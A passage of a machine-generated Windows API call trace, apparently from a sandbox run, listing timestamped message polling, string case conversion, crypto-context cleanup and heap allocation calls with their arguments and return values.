lpMsg=0x8bf710) returned 0 [0207.609] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.609] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.610] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0207.610] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.610] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0207.610] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.610] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.610] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.610] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0207.610] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.610] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0207.610] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0207.611] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.611] CryptDestroyKey (hKey=0xaa5820) returned 1 [0207.611] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.611] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.611] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0207.611] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0207.611] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0207.611] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0207.611] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0207.611] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0207.611] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0207.612] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0207.612] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0207.612] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0207.612] PeekMessageW (in: lpMsg=0x8beee8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8beee8) returned 0 [0207.612] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0207.612] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.612] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0207.612] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.612] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0207.612] PeekMessageW (in: lpMsg=0x8bed48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed48) returned 0 [0207.612] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0207.612] PeekMessageW (in: lpMsg=0x8bf148, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf148) returned 0 [0207.613] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.613] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0207.613] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.613] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0207.613] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.613] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0207.613] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.613] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.613] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0207.613] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.613] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0207.613] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.614] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.614] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0207.614] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.614] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0207.614] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0207.614] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0207.614] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0207.614] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0207.614] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.614] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.614] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.614] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.615] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.615] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.615] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0207.615] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.615] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0207.615] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.615] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.615] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0207.615] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0207.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0207.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0207.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0207.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0207.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0207.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0207.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0207.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0207.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0207.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0207.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0207.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0207.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0207.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0207.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0207.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0207.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0207.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0207.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0207.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0207.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0207.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0207.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0207.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0207.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0207.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0207.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0207.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0207.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0207.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0207.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0207.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0207.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0207.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0207.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0207.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0207.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0207.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0207.619] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0207.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0207.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0207.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13d8 [0207.619] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0207.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0207.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0207.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0207.619] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0207.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0207.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0207.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0207.620] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0207.620] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0207.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0207.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0207.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0207.621] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0207.621] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0207.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0207.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0207.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.621] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0207.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0207.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0207.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0207.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0207.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0207.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0207.622] FreeLibrary (hLibModule=0x74d40000) returned 1 [0207.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0207.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.622] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0207.622] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0207.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0207.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0207.623] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0207.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0207.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0207.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0207.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0207.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0207.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0207.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0207.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0207.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0207.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0207.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0207.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0207.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0207.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0207.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0207.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0207.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0207.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa068 [0207.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0207.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fc0 [0207.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0207.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9eb8 [0207.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0207.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0207.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa158 [0207.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0207.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0207.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0207.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0207.625] CloseHandle (hObject=0x1f8) returned 1 [0207.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0207.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0207.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0207.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0207.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0207.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0207.627] HeapFree 